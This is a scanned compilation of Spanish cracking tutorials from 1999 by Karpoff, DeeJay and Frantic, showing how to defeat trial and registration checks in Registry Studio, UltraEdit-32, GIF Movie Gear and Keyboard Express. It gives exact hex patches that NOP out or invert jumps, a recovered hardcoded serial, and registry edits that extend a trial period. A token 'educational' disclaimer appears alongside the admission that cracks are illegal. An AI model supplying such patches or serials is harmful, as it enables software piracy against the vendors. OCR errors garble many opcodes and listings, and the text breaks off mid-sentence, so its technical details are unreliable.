Pues esto es todo. Que os a parecido.. interesante no¿? Como siempre mi mayor deseo 
es que entendáis esto como yo intento explicarlo. 


Un saludo para todos/as (karpoff) hasta el proximo que sera el n* 14 


EMAIL: Kf_ karpofffhotmail.com 


URL: http://welcome.to/karpoff 


http://members.xoom.com/kf karpoff 


El uso de este material es solo para uso educativo, por ahora los cracks son ilegales 
cada cual es responsable del uso que le de a este tutorial, el autor no se hace 
responsable de nada. 


Karpoff Spanis 


Tutorial Descargado de 


HH Tutoríal de Crackeo Para Newbies desde Cero 24/10/99 
Por Karpoff +++ KARPOFF-NEW 98/99 +++ 


PROYECTO 14 ++ 


- Regitry Studio V1.01 
INTRODUCCION 


HE hola nuevamente a todos!!! Si, después de unas semanas sin escribir nada por fin saque 
un poco de tiempo para presentaros otro proyecto, mi falta de tiempo en parte es por 
vosotros que habéis conseguido llenarme el buzón de correo con las 1000 y una pregunta J 
. Muchas de las preguntas que hacéis están relacionadas con.. 


Que significa call, jmp, ret, etc, por que EB = JMP 74 = JE etc. 


Este tipo de preguntas os recomiendo que echéis un ojo a manuales o libros sobre ASM, 
que en la red tenemos muchisimos manuales sobre ASM para todos los niveles, no 
obstante aclarare alguna de estas dudas sin extenderme demasiado. 


También os pido que antes de preguntarme cualquier duda busquéis en otros manuales que 
seguro que encontrareis la respuesta, y en caso de no encontrar ninguna respuesta podéis 
contar con migo pero buscar primero J por que no doy abasto intentando responder todas 
las dudas, y generalmente cada email es un programa que tenéis problemas para petarlo, 
con lo cual si os quiero ayudar tengo que conseguir el programa y eso multiplicado por 50 
Os podéis imaginar. 


En la pagina de WKT existen unos foros sobre Cracking donde podéis exponer vuestras 
dudas y seguro que encontrareis ayuda, eso si os digo lo mismo, antes de postear una duda 
en el foro aseguraros de que la respuesta no este en cualquier manual oseea mirar un poco 
antes de exponer dudas, para acceder a estos foros podéis entrar directamente desde la 
pagina principal de mi Web o desde la pagina de WTK cuya dirección esta en la pagina de 
links de mi Web. 


1* PARTE 


El programa Víctima de hoy es un estupendo editor del registro de Windows, con muchas 
funciones y utilidades, lo podéis coger de: 


http://tucows.teleweb.pt/files4/rs linst.exe (440 KB) 


Herramientas 
Softlce V3x o posterior 
W32Dasm V8.93 


Editor Hexadecimal (cualquiera yo utilizare. Hex Workshop V2.54) 


Comportamiento del Programa 


Al ejecutar el programa no nos muestra ningún tipo de Nag ni tansiquiera nos dice el 
tiempo que nos queda de evaluación, desde el programa y pulsando sobre studio tenemos 
la opción de registrarnos mediante el típico nombre y s/n, una vez que hemos agotado el 
tiempo de evaluación y ejecutamos nuestra víctima nos muestra la opción para registrarnos 
si fallamos con los datos no hay posibilidad de que el programa se inicie. 


Ataque 


Bien lo típico seria Introducir los datos del registro al azar y mediante el mensaje de error 
intentar suprimir la rutina de comprobación, pero vamos a atacarle a partir de que el 
programa expire, de tal manera una vez pasada la evaluación nunca llegue a mostrarnos la 
ventana de registro haciendo así a nuestra víctima incaducable, por que escojo este 
método?? Por que este programa tiene una pequeña protección que cuando modificas 
cualquier parte del código, el programa no se inicia con lo cual no podríamos parchearlo. 


Lo primero es estudiar que ocurre cuando modificas el código, por que el programa no se 
inicia y una vez localizado esto y modificado evitaremos que que el programa caduque. 
Osea que manos a la obra. 


2” Parte 


A trabajar, bien como siempre lo primero es prepararnos todo para trabajar cómodamente, 
iniciamos Windows cargando el Softlce, hacemos una copia del ejecutable RegStudio.exe 
con el nombre Studio.exe, desensamblamos el original y editamos con el editor Hex la 
copia Studio.exe y por ultimo adelantamos la fecha de Windows 1 mes para trabajar con el 
programa expirado, ya tenemos todo a punto 


Bueno vamos a ir paso a paso por que como dije quiero aprovechar para explicar algunas 
dudas. 


Ejecutamos RegStudio.exe y lo primero que vemos es una ventanita con la opción de 
registrarnos y con el siguiente aviso "Trial period has expired. Do you tal y tal" 


Directamente vamos al W32dasm y buscamos esta cadena de texto en las strign dataa 
Refernces pulsando sobre [STRN-REF'] hay podemos ver la referencia que buscamos, 
algo que me llamo la atención es que hay poquisimas referencias a cadenas de texto por 
ejemplo no vemos ninguna que haga referencia a cuantos dias de evaluación nos quedan, 
ni el típico invalid code, Thank you for register etc. Y el motivo de esto es la librería 
regStudio.dll donde se encuentran todas estas y muchas mas de hecho husmeando un 
poquito si la desensambláis podéis modificar la rutina que decide si el reg metido es 
correcto o no y que os acepte cualquier numero de registro, además no cuenta con la 
protección que tiene el ejecutable ósea que modifiques lo que sea el programa se inicia, 
pero creo que es mas interesante atacar al ejecutable y romperle el royó anti inicio que 
tiene. 


Bueno pulsamos sobre Trial period has expired. Do you y vamos a: 

* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 
1:00401351(C) 

| 

:0040135C 83F801 cmp eax, 00000001 

:0040135F 7509 jne 00401364 - Salto Interesante 


:00401361 SF pop edi 


:00401362 SE pop esi 
:00401363 81C4F4000000 add esp, 000000F4 


:00401369 C3 ret — Retorno Cabron 


* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 
1:0040135F(C) 

| 

:0040136A 6A04 push 00000004 

:0040136C 6824564000 push 00405624 

* Possible StringData Ref from Data Obj] ->"Trial period has expired. Do you " 
->"want to register now?" 

| 

:00401371 68D4504000 push 004050D4 — Aquí Aparecemos 


:00401376 6A00 push 00000000 


Viendo que tenemos un jne en 0040135F es lógico pensar que si este no se ejecuta pillara 
el retorno (ret) evitando así el mensaje de expiración, 


ACLARACION A VUESTRAS DUDAS: Como viendo un jne o ¡mp o una Call sabemos 
a donde va a parar ¿? 


S1 te fijas todos los saltos (¡ne, je, jmp etc.) llamadas (call) 


0040135F 7509 jne 0040136A 

0040135F ---- Direccion de memoria en la que se encuentra el salto 

7509 ----- el 75 representa en Hexadecimal a Jne para esto nos sirve el editor hex para 
modificar estos valores y beneficiarios, el 09 --- este valor dependerá de la distancia a la 
que se dirija el salto (¡ne)cuanto mas lejos valla mayor será el valor. 


00401364 --- La dirección a donde ira el ¡ne sí este llegase a ejecutarse. 


Entonces sabemos con ver 0040135F 7509 jne 00401364 que este salto iría a la dirección 
de memoria 00401364 que en este caso y viendo el código del programa que estamos 
estudiando nos llevaría a 0O040136A 6A04 push 00000004 

Bueno esto queda aclarado 

CONTINUAMOS Estabamos en lo interesante que seria modificar 

0040135F 7509 ¡ne 00401364 por un nop nop para que no se ejecute el salto y no llegue 
nunca a mostrarnos el mensaje de expired, probemos localizamos el offset de este salto que 
es 135F y nos vamos al editor hex cambiamos el 7509 por un 9090 con esto el salto queda 
eliminado ya no existe (9090 es = a nop nop que en asm son instrucciones que no hacen 
nada (otra duda)) probamos a ejecutar studio.exe y como os comente el programa no hace 
nada antes de abrirse ya se ha cerrado, veamos por que puede ocurrir esto. 

* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 

1:00401351(C) 

| 

:0040135C 83F801 cmp eax, 00000001 

:0040135F 7509 jne 00401364 - Salto Interesante 

:00401361 SF pop edi 

:00401362 SE pop esi 


:00401363 81C4F4000000 add esp, 000000F4 


:00401369 C3 ret — Retorno Cabron 


Bueno pues vemos que si quitamos del medio el jne la siguiente instrucción importante es 
el retorno ( RET) en azul ahora tenemos que averiguar que call es el responsable de que 
este el ret. 


((otra duda) que es Ret?? Los ret son instrucciones de retorno de una llamada (call) osea 
que siempre que veamos un 


Call xxxxxx para seguirlo iremos a la dirección xxxXxx y todo lo que se encuentre entre el 
call xxxxxx y el siguiente ret será el contenido y la ejecución de esa llamada (call))) 


CONTINUAMOS para localizar la llamada (call) responsable de que exista ese ret no 
tenemos mas opción que utilizar nuestro querido y amado Softlce, ejecutamos la consola 
del softice cargamos el archivo RegStudio.exe para saber donde se encuentra el call 
responsable podemos poner un BreakPoint directamente a el salto que hemos parcheado 
antes (aseguraros de que el ejecutable que cargáis en el softice es el original y que no es el 
que hemos parcheado) pulsamos el botón de los engranajes (load)cuando nos salga el 
típico mensaje del softice aceptamos y entramos directos al soft (recordar la dirección del 
salto para ponerle un BP) 


Bpx 0040135F 


Pulsamos FS para que siga la ejecución del programa e inmediatamente se para en la 
dirección a la que le pusimos el BP, fígaros como en 


0040135F 7509 ¡ne 0040136A — que es donde se para el soft 


hay a su derecha una flecha indicando que este salto se ejecutara a la dirección de memoria 
que apunta, claro se salta el RET que nos interesa, ósea que parcheamos el jne como antes 
convirtiéndolo en un nop nop para hacerlo desde le soft metemos el commando a que es 
ensamblar 


a 40135f [Intro] en azul lo que ponemos y pulsamos Intro, seguimos los pasos 
- 0040135f nop [Intro] 
- 00401360 nop [Intro] 


- 00401360 [Intro] 


quitamos el BP para que nos moleste 
bc *  - Quitar todos los BP 


y ya hemos ensamblado el salto suprimiéndolo ahora vamos pulsando F10 hasta llegar al 
ret otro F10 y justamente nos lleva a 


:0040103A EsC1020000 call 00401300 — La responsable del ret 
:0040103F 85CO0 test eax, eax 
:00401041 0F85BE010000 jne 00401205 — muy interesante 


Tenemos localizado la llamada responsable del ret hechemosle un ojo, cuando parcheamos 
antes el primer salto y lo convertimos en mierda el ret nos trae a 


0040103F 85CO0 test eax, eax — aquí 

aquí se compara los valores de eax si estos son iguales hará que se ejecute 
00401041 OF8S5BE010000 ¡ne 00401205 — si se ejecuta chungo 
si se ejecuta nos manda a 

:00401205 5F pop edi -- aqui 

:00401206 SE pop esi 

:00401207 5D pop ebp 

:00401208 33C0 xor eax, eax 

:0040120A 5B pop ebx 

:0040120B 81C4F4010000 add esp, 000001F4 

:00401211 C21000 ret 0010 — nos saca del programa 


bueno si quereis seguir todo el proceso con el soft os lo recomiendo si no entendéis lo que 
ocurre, 


al ejecutarse el salto 00401041 0F85BE010000 jne 00401205 veis que nos lleva a una serie 
de instrucciones que nos sacan inmediatamente del programa he aquí la estúpida 
protección, si es que esta puesta como tal aunque creo que si si os fijáis en cualquier 
pedazo de código encontráis un ret que si lo seguís con el soft nos trae al mismo sitio. 


Ya solo nos queda hacer que no se ejecute nunca este salto, para ello lo eliminamos con 
una serie de 6 nop o 90s. Localizamos el offset que es 1041 y vamos a nuestro editor hex 
donde cambiamos 0F85BE010000 por 909090909090 salvamos los cambios y el 
ejecutable funciona perfectamente sin limitaciones de tiempo. 


Recordar que tenemos que parchear los dos saltos que hemos analizado, acordaros también 
de volver a poner la fecha actual a Windows. 


Pues esto es todo. Que os a parecido.. interesante no¿,? Como siempre mi mayor deseo es 
que entendáis esto como yo intento explicarlo. 


Un saludo para todos/as (karpoff) 


No responderé a los emils con pedidos de Cracks ni a las preguntas cuya respuesta se 
pueda encontrar en cualquiera de estos tutoriales, por lo demás como siempre podéis 
contar con migo. 


EMAIL: Kf_karpoff hotmail.com 


URL: http://welcome.to/karpoff 


http://members.xoom.com/kf_karpoff 


El uso de este material es solo para uso educativo, por ahora los cracks son ilegales 
cada cual es responsable del uso que le de a este tutorial, el autor no se hace 
responsable de nada. 


Karpoff Spanis 
Tutorial Descargado de o 


Programa UEdit32 6.20b W95 / W98 
Descripción Bitar Hexadeima 
O 

Url SA 


Objetivo [Quitar Nag Screen, y limite de fecha 


Introducción 


Nada mas inicirar comprueba la fecha y te muestra una nag screen para que te 
registres. si la fecha caduca se acabo. 


Al Atakerrrr 


Primer contacto: 


Vamos a ver que pasa si pasamos la fecha limite, cambiamos la fecha y vemos 
que nos sale un mensaje diciendo que ha expirado. 

Muy bien, buscaremos la cadena EXPIRED 

* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:0045A71C(C) <-- condicion que ha de cumplir para caducar 

| 

:0045A72A ESO6BEFAFF call 00406535 

:0045A72F 391D206D4D00 cmp dword ptr [004D6D20], ebx 
:0045A735 758A ¡ne 0045A6C1 

:0045A737 A1040E4D00 mov eax, dword ptr [004D0E04] 
:0045A73C 894510 mov dword ptr [ebp+10], eax 

:0045A73F 894514 mov dword ptr [ebp+14], eax 


* Possible Reference to String Resource ID=00068: "UltraEdit 45 Day 
Evaluation time expired!!!!" <-- APRECEMOS AQUI 


:0045A742 6A44 push 00000044 

:0045A744 8D4D10 lea ecx, dword ptr [ebp+10] 
:0045A747 C645FC02 mov [ebp-04], 02 
:0045A74B ES0F8A0200 call 0048315F 


si miramos el codigo un poco mas arriba vemos que se tiene que cumplir la 


condicion de la fila 0045A71C. 
Pues vamos a ver que condicion nos pide. 


Possible StringData Ref from Data Obj ->"Settings" 

| 

:0045A6FD 68F0054D00 push 004DO5FO 

:0045A702 E860030300 call 0048AA67 

:0045A707 A14C6D4D00 mov eax, dword ptr [004D6D4C] 
:0045A70C 2B05546D4D00 sub eax, dword ptr [004D6D54] 
:0045A712 50 push eax 

:0045A713 E8323C0100 call 0046E34A 

:0045A718 83F82D cmp eax, 0000002D 

:0045A71B 59 pop ecx 

:0045A71C 7FOC jg 0045A72A <--- SE TE HA ACABADO EL TIEMPO 
:0045A71E 399E44010000 cmp dword ptr [esi+00000144], ebx 
:0045A724 OFS576FFFFFF jne 0045A6AO 


Bueno bueno, que osea que nos mannda a la calle si la fecha es mayor (Jg), ok 
pues podriamos poner jng pero funcionaria a partir de la fecha caducada a si que 
mejor que no ponga nada cambiamos 7FOC por 9090 osea nop nop XD. 

fin del caducado. 

vamos a por la nag. 

ahora la nag nos dice que nos quedan 0 dias, pero hay sigue dando la lata, 
vamos a cepillarnolas. buscamos una referencia por ej unregistered, el primero 
que nos localiza es: 

Name: DialogID_006E, + of Controls=008, Caption:"", ClassName:"" 

001 - ControlID:FFFF, Control Class:"STATIC" Control Text:"This is an 
unregistered copy of UltraEdit-32. Use of this program should be o" 

002 - ControlID:0080, Control Class:"STATIC” Control 


ahora buscamos una referencia a DialoglD_006E 
y vemos: 

* Referenced by a CALL at Address: 
100454644 <---- UNA LLAMADA 


| 
:0040929F FF742404 push [esp+04] 


* Possible Reference to Dialog: DialogID_006E 


* Possible Reference to Dialog: DialogID_0069, CONTROL_ID:006E, "" 
| 


* Possible Reference to String Resource ID=00110: "Select directory to 
search." 


:004092A3 6A6EÉ push 0000006E 
:004092A5 Es4A520700 call 0047E4F4 
:004092AA F7D8 neg eax 

:004092AC 1BCO0 sbb eax, eax 
:004092AE F7D8 neg eax 


:004092B0 C20400 ret 0004 


EOS 


VAMOS A 00454644 


EOS 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
[:0045ASAC(C) <--- UNA CONDICION UMMM HABRA QUE VER QUE ES 


:0045A639 FF761C push [esi+1C] 

:0045A63C 8DBE28010000 lea edi, dword ptr [esi+00000128] 
:0045A642 8BCF mov ecx, edi 

:0045A644 ES56ECFAFF call 0040929F <-- MUESTrA LA NAG 
:0045A649 85CO0 test eax, eax 

:0045A64B 7506 jne 00454653 

:0045A64D 899E44010000 mov dword ptr [esi+00000144], ebx 


OOOO 
OOOO 


:0045ASAS 8B7004 mov esi, dword ptr [eax+04] 

:0045ASAS 8B4514 mov eax, dword ptr [ebp+14] 

:0045ASAB 48 dec eax 

:0045ASAC 0F8487000000 je 0045A639 <-- ANDA ESTA AQUÍ, ¿ QUE 
PASA SI CAMBIO EL JE x JNE? NO NAG 

:0045A5B2 48 dec eax 

:0045A5B3 0F8508010000 jne 0045A6C1 

:0045A5B9 391D206D4D00 cmp dword ptr [004D6D20], ebx 

:0045A5BF 7413 je 0045A5D4 

Podriamos tambien eliminar la nag poniendo el famoso 90 en la lina 0045a5ac, 
pero para que malgastar teclas XD, bastara con cambiar 0F3487000000 por 
0F8587000000 

un saludo “DeeJay? 


[ Entrada | Documentoz Genéricoz | WKT TEAM Main Site ] 


[[ Tutorialz : Ix Tipo de Protección | x Fecha de Publicación ] x orden Alfabético ] 


Karpoff Spanis 
Tutorial Descargado de O 


Fase 1 (05/10/99) - gif movie gear 2.5 by “DeeJay” 


Esta en: http://www.gamani.com 


Herramientas usadas: W32Dasm 


tiempo invertido 3 minutos 


serial : lamaken 


Primer contacto: 


ejecutamos el programa y nos pide registro, claro antes nos recuerda el 
limite de fecha 


para que no se nos olvide. 


Introducimos un numero de serie cualquiera, y ehhh¡¡, hemos fallado XD 


Ok, busquemos algo que nos sea familiar por ej "provided is invalid" 
aparecemos en 0040d574: 
* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :0040D4C7 (C) 


:0040D56D 6A30 push 00000030 


* Possible Reference to String Resource ID=40213: "Invalid Registration 
Info" 


:0040D56F' 68159D0000 push 00009D15 


* Possible Reference to String Resource ID=40212: "The information you 
have provided is invalid. Please be sure" 


:0040D574 68149D0000 push 00009D14 
:0040D579 56 push esi 

:0040D57A E851270100 call 0041FCDO 
:0040D57F 83C410 add esp, 00000010 


una vez visto el codigo nos fijamos en la condicion 0040D4C7 


pulamos SHIFT+12 e introducimos dicha direccion lo que nos lleva al 
siguiente codigo: 


* Possible Reference to Dialog: DialoglID_0070, 


CONTROL_ID:0450, 


:0040D4A8 6850040000 push 00000450 

:0040D4AD 56 push esi 

:0040D4AE FFDY call edi 

:0040D4B0 50 push eax 

:0040D4B1 FFD3 call ebx 

:0040D4B3 8D442478 lea eax, dword ptr [esp+78] 
:0040D4B7 8D4C2414 lea ecx, dword ptr [esp+14] 
:0040D4BB 50 push eax 

:0040D4BC 51 push ecx 

:0040D4BD E8S3EFCFFFF call 0040D100 <---— comprueba el numero 
:0040D4C2 83C408 add esp, 00000008 

:0040D4C5 85C0 test eax, eax 


:0040D4C7 0F84A0000000 je 0040D56D <--—- no has pagado el viaje 
:0040D4CD 8D442410 lea eax, dword ptr [esp+10] 
:0040D4D1 8D4C240C lea ecx, dword ptr [esp+0C] 
:0040D4D5 50 push eax 

:0040D4D6 51 push ecx 

:0040D4D7 6A00 push 00000000 

:0040D4D9 683F000F00 push 000F003F 

:0040D4DE 6A00 push 00000000 

:0040D4E0 6880954300 push 00439580 

:0040D4E5 6A00 push 00000000 

vamos a ve lo que hace nuestra llamada 0040D4BD: 
* Referenced by a CALL at Addresses: 


| :0040D292 , :0040D4BD 


:0040D100 8B542408 mov edx, dword ptr [esp+08] 
:0040D104 53 push ebx 

:0040D105 56 push esi 

:0040D106 57 push edi 

:0040D107 8A02 mov al, byte ptr [edx] 
:0040D109 3C6C cmp al, 6€C. <------- 1 


:0040D10B 752D jne 0040D13A 


:0040D10D 807A0161 cmp byte ptr [edx+01], 61 <------- a 


:0040D111 


:0040D113 


:0040D117 


:0040D119 


:0040D11D 


:0040D11F 


:0040D123 


:0040D125 


:0040D129 


:0040D12B 


:0040D12F 


7527 3ne 


807A026D 


7521 3ne 


807A0361 


751B jne 


807A046B 


7515 jne 


807A0565 


750F jne 


807A066É 


7509 jne 


0040D13A 


cmp byte 


0040D13A 


cmp byte 


0040D13A 


cmp byte 


0040D13A 


cmp byte 


0040D13A 


cmp byte 


0040D13A 


ptr 


ptr 


ptr 


ptr 


ptr 


[edx+02], 


[edx+03], 


[edx+04], 


[edx+05], 


[edx+06], 


6D 


61 


65 


6ÉE 


:0040D131 B801000000 mov eax, 00000001 


:0040D136 5F pop edi 


:0040D137 5E pop esi 


:0040D138 5B pop ebx 


:0040D139 C3 ret 


AQUI TENEMOS 
MOSTRANDO en 


NUESTRO SERIAL COLOCADITO EN ORDEN SEGUN NOS LO VA 
codigo HEX, 


lo pasamos a ascii y tenemos nuestro codigo: 6Ch=1 6lh=a 


XD 


saludos, *DeeJay”. 


Karpoff Spanis 
Tutorial Descargado de o 


Prolongando el periodo de evaluación 


Por Frantic 


PROGRAMA: Keyboard Express 2000 v2.7 (by Insight Software Solutions, Inc.) 
http://www.keyboardexpress.com 


El ejecutable (keyexp.exe) es de 767 Kb. Está hecho en Delphi. 


Descripción: Keyboard Express es una utilidad de macros de teclado para Windows. 
Permite ejecutar prácticamente cualquier secuencia de teclas en aplicaciones Windows con 
una combinación de un par de teclas, o a intervalos de tiempo. Las pulsaciones de tecla 
pueden introducirse manualmente y se les pueden asignar hasta 514 combinaciones 
distintas. Además, las pulsaciones de tecla pueden ser capturadas automáticamente cuando 
son ejecutadas en una Aplicación Windows. 

(Traducido de la Ayuda de Keyboard Express) 

PROTECCION: Periodo de evaluación de 30 días 

FINALIDAD: Simular estar registrados 

HERRAMIENTAS: 

W32Dasm 8.9 

HIEW 5.66 u otro editor hexadecimal 


NIVEL: Principiante 


INTRODUCCION 


Este programa, además de servirnos para hacer una práctica de desprotección, puede 
resultar en sí mismo útil. Te recuerdo que de ser así corras a comprarlo y no se te ocurra 
utilizar la copia alterada porque hacerlo es ilegal. Estamos aquí para ampliar nuestros 
conocimientos y pasar un rato entretenido. 


Como digo, es un programilla shareware majo, pero el tema de la seguridad deja mucho 
que desear: se puede atacar de varias maneras. Yo voy a explicar la que llevé a cabo, que 


no es la única. 


Este es mi primer tutorial y está dirigido a quienes están empezando en esto. Asumo que 
incluso no estés familiarizado con el uso de las herramientas que vamos a utilizar. Las 
explicaciones son bastante pormenorizadas y están de sobra para otros muchos. Lo he 
escrito así porque sé por propia experiencia lo bien que viene un tutorial muy detallado, sin 
dar por supuestas cosas que tal vez para un principiante aun no están claras. 


PROCEDIMIENTO 


FASE 1 


Instalamos el programa y echamos un vistazo. ¡Ojo! Pueder ser que el programa se inicie 
oculto y al hacer doble click sobre el icono del ejecutable la pantalla parpadee, pero no 
aparezca nada...Si es así, haz doble click de nuevo y aparecerá un mensaje diciendo que el 
programa ya está cargado y para activarlo hay que hacer click con el botón derecho, 
mientras se tiene pulsada la tecla de Ctrl. Lo dicho...pero vamos a empezar por arreglar 
esto (A mí me ocurrió la primera vez, puede ser que no sea tu caso). En el menú Options / 
Program Activate Key selecciona "None — Do not hide". Tras echar un vistazo a los 
menús, todo el mundo recomienda leerse los archivos de ayuda porque puede haber info 
que ayude a comprender mejor cómo hallar antes los puntos débiles de los sistemas de 
protección. 


En el apartado "License" casi al final hay una alusión a la versión de evaluación y a un 
fichero que habilita la licencia del programa y elimina la pantallas de 
recordatorio...(Cuando cierras el porgrama aparece esa pantalla que te recuerda que tienes 
30 días para evaluar el programa, a la vez que señala el número de utilizaciones y días 
transcurridos. Justo al final, en "Support..." algo muy interesante: dice dónde está la clave 
del sistema de protección del programa. Se trata del fichero KYX952X.DLL . Más 
adelante, gracias a esta información, podremos guiarnos en nuestro objetivo. 


FASE 2 


Primeramente, vamos a hacer una copia del ejecutable (keyexp.exe) y renombrarla como 
keyexp.w32. Desensambla con W32Dasm esta copia (keyexp.w32) 


(Asegúrate de que tu versión W32Dasm NO sea la de Visual Basic porque 
solo muestra las String Ref. en Programas Visual Basic) 


Si miras en el menú Refs/ String Data References encontrarás cosas como esta: 
ISSKEYEXP27. ¿Qué será...? Doble click sobre esa referencia y aparecemos en 


:004493A7 BA7C974400 mov edx, 0044977C 


(la dirección :004493A7) puede variar en función PC que tengas, pero los últimos números 
serán iguales. 


El fragmento más ampliado es 

* Possible StringData Ref from Code Obj ->" ISSKEYEXP27" 

| 

:004493A7 BA7C974400 mov edx, 0044977C fl estamos aquí 

:004493AC 8BC3 mov eax, ebx 

:004493AE ESFDD6FBFF call 00406ABO 

:004493B3 8D45FC lea eax, dword ptr [ebp-04] 

:004493B6 50 push eax 

:004493B7 53 push ebx 

:004493B8 6800000080 push 80000000 

* Reference To: advapi32.RegOpenKeyA, Ord:0000h 

| 

:004493BD E836BFFBFF Call 004052F8 

La referencia a "advapi32.RegOpenKeyA"” indica que se trata de algo del registro 
de Windows. Ve al botón Inicio de la Barra de tareas y selecciona Ejecutar. A 
continuación escribe en la ventana "regedit" (sin las comillas) y Aceptar. Se abrirá el 


Editor del Registro de Configuraciones. ¡Ojo! Porque este es un terreno peligroso; no 
toques nada más de lo indicado. En el menú Edición seleccionas Buscar y escribes 


ISSKEYEXP27. Click en "Buscar siguiente” y, al poco, el editor se desplaza al lugar 
donde se halla dicha clave. Haces click en el + de la izquierda y aparecerá otra carpeta con 
el mismo nombre. Haces click sobre esta última y verás que en la ventana de la derecha 
bajo el apartado "Datos" ha aparecido una longaniza de números que terminan con dos 
NN. Se trata del dia, mes, año de instalación, seguido de un contador en el que se lleva la 
cuenta de las veces que se ha utilizado el programa. 


Si haces click con el botón secundario del ratón sobre (Predeterminado) aparecen tres 
opciones, de las que debes seleccionar Modificar. 


Se abrirá otra ventana: Editar cadena. La cadena está resaltada. Haz click en el rectángulo 
y sustituye las cifras del año por otras. Pongamos que tenemos 0711199900003NN., 
Cambiamos el 1999 por 2222 y Aceptar. Verás que los nuevos datos aparecen en la 
ventana anterior, a la derecha. Si está bien, cierra el Editor del Registro de Configuraciones 
haciendo click en el botón x del la esquina superior derecha; si no ha salido bien, repite los 
pasos anteriores. Si se ejecuta ahora el Keyboard Express y se vuelve a cerrar, aparecerá la 
pantalla de recordatorio diciendo que llevamos utilizando el programa ¡una cantidad 
negativa de miles de días...! 


Puedes hacer otra prueba editando de nuevo la clave de este programa que está en el 
registro. Esta vez haz que el año sea uno pasado, por ejemplo, 1997. Arranca el programa. 
Aparentemente no sucede nada. En "Options/Program Activate Key", selecciona "System 
Tray Icon Only". Cierra y abre de nuevo el programa. Ahora aparece un icono en la parte 
derecha de la barra de tareas. Con el botón secundario del ratón elige "Open Keyboard 
Express" Verás que aparece un mensaje diciendo que el periodo de evaluación ha 
terminado y las macros ya no funcionarán. Aceptas y sale la nag. Cierras el programa y 
vuelve a salir... Si quieres volver a cambiar la clave del registro para dejar los datos reales, 
hazlo, pero da igual. 


Esta es una de las maneras de prolongar el periodo de evaluación de este programa. Ya se 
ve que se han cubierto de gloria al diseñar los datos del registro. 


Pero este no es el objetivo principal de este tutorial. Acabamos de ver una de las formas de 
burlar la protección, pero hay otros. Con el cambio del registro se consigue que el 
programa no caduque, pero cuando lo cierras te aparece el dichoso recordatorio y te hace 
perder tiempo cerrándola también; además, ya sabemos que es una versión de evaluación y 
es molesto que nos lo recuerden cada vez que se cierra la aplicación. También podemos 
dejar el programa minimizado, y se cierra con el sistema, en cuyo caso, no muestra la nag. 
Pero como no nos gusta, y de lo que se trata es de aprender, vamos a volver a la List of 
String Data Items del W32Dasm y seguir buscando cosas que nos ayuden a "mejorar" este 
programa. 


FASE 3 

Bajando unas cuantas líneas por esa ventana nos encontramos con "Fully Licensed 
Version”. Bien, esto significa que hay un porción de código que, de ser ejecutada, nos 
concede la categoría de usuarios registrados, con las ventajas que esto supone, como, por 
ejemplo, que no volverá a salir la "nag screen" cada vez que cerremos la aplicación. 
Hacemos doble click sobre la línea y aparece resaltada en la pantalla principal esta otra: 
:0044CE8C BA34CF4400 mov edx, 0044CF34 

Este es el fragmento ampliado donde se encuenta esa línea: 

* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 

[:0044CE78(C) 


* Possible StringData Ref from Code Obj ->"Fully Licensed Version" 

| 

:0044CE8C BA34CF4400 mov edx, 0044CF34 

:0044CE91 8B83C8010000 mov eax, dword ptr [ebx+000001C8] 

:0044CE97 ESBC7DFCFF call 00414C58 

:0044CE9C 803D609B470000 cmp byte ptr [00479B60], 00 

:0044CEA3 743C je 0044CEE1 

:0044CEAS BA4CCF4400 mov edx, 0044CF4C 

Justo por encima de la referencia a "Fully Licensed Version" hay otra referencia a un salto. 
Eso significa que se llega hasta aquí si se produce el salto en otro punto del programa, en 


nuestro caso en :0044CE78. La (C) significa que es un salto Condicional, es decir, un salto 
que se ejecuta si se da un condición previa. 


FASE 4 


Vamos al lugar donde está ese salto a ver qué es lo que tiene que ocurrir para que el salto 
se produzca. En el menú "Goto" elegimos "Goto Code Location" e introducimos la 
dirección que se menciona en la referencia del salto (0044CE78) y OK. 


Hemos retrocedido un poco en el código del programa. Ahí está el salto; se trata de un "je". 
Este es el fragmento: 


:0044CE66 68F7CE4400 push 0044CEF7 

:0044CE6B 64FF30 push dword ptr fs:[eax] 

:0044CE6E 648920 mov dword ptr fs:[eax], esp 

:0044CE71 803DB49C470000 cmp byte ptr [00479CB4], 00 
:0044CE78 7412 je 0044CE8C fl estamos aquí 

* Possible StringData Ref from Code Obj ->"Unlicensed Shareware Copy" 
| 

:0044CE7A BA10CF4400 mov edx, 0044CF10 

:0044CE7F 8B83C8010000 mov eax, dword ptr [ebx+000001C8] 

* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 
[:0044CEOF(C) 

| 

:0044CE85 ESCE7DFCFF call 00414C58 

:0044CE8A EB55 ¡mp 0044CEE1 

* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 


[:0044CE78(C) 


* Possible StringData Ref from Code Obj ->"Fully Licensed Version" 


:0044CE8C BA34CF4400 mov edx, 0044CF34 
:0044CE91 8B83C8010000 mov eax, dword ptr [ebx+000001C8] 
:0044CE97 ESBC7DFCFF call 00414058 


El salto este, en caso de producirse, "pasa por encima" del fragmento de código referente a 
"Unlicensed Shareware Copy”. En otras palabras, evita que el programa asuma que se trata 
de una copia no registrada y en periodo de evaluación, que es lo que ocurre hasta ahora 
cada vez que usamos la aplicación. Por tanto, está claro que cuando se ejecuta el programa 
y llega a ese salto, lo ignora y sigue, ejecutando el fragmento de código correspondiente a 
"Unlicensed Shareware Copy”. ¿Por qué sucede esto? La respuesta está en la instrucción 
anterior al salto. 


:0044CE71 803DB49C470000 cmp byte ptr [00479CB4], 00 fl Comparación 
:0044CE78 7412 je 0044CE8C fl Salto Condicionado 


La instrucción "cmp" compara lo que hay en una posición de memoria (en este caso 
00479CB4) con un dato inmediato (en este caso 00) . Esta instrucción lo que hace es restar 
del primer valor el segundo. Dependiendo del resultado de esta resta, la "zero flag" se 
activa O no. Si el resultado de la comparación, es cero, la zero flag se activa; de lo 
contrario, no se activa. A continuación, en la siguiente instrucción el programa ejecuta el 
salto "je" si la "zf" está activada ("je" viene a significar "jump 1f equal" = salta si es igual ). 
De aquí podemos deducir que el dato que hay en el primer parámetro de la comparación 
(ptr [00479CB4]) es distinto de cero. 


Para modificar la situación se me ocurren dos cosas: 


1. Modificar el salto, de manera que la instrucción sea "jne" (jump if not equal = salta 
